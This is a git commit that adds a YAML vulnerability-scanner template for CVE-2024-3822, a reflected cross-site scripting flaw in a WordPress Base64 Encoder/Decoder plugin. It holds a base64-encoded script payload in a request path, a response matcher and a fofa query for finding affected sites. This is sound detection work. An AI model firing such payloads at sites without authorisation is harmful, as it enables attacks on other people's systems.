Added template for CVE-2024-3822

patch-4
Mohammad Reza Omrani 1970-01-01 00:00:00 +00:00
parent 3777ab6755
commit ee96b85655
1 changed files with 27 additions and 0 deletions

27
CVE-2024-3822.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2024-3822
info:
name: Base64 Encoder/Decoder <= 0.9.2 - Reflected XSS
author: omranisecurity
severity: medium
description: |
- The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
reference: |
- https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3822/
metadata:
fofa-query: "wp-content/plugins/base64-encoderdecoder/"
max-request: 3
tags: cve,wordpress,plugin,xss
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "<script>alert(1)</script>")'
condition: and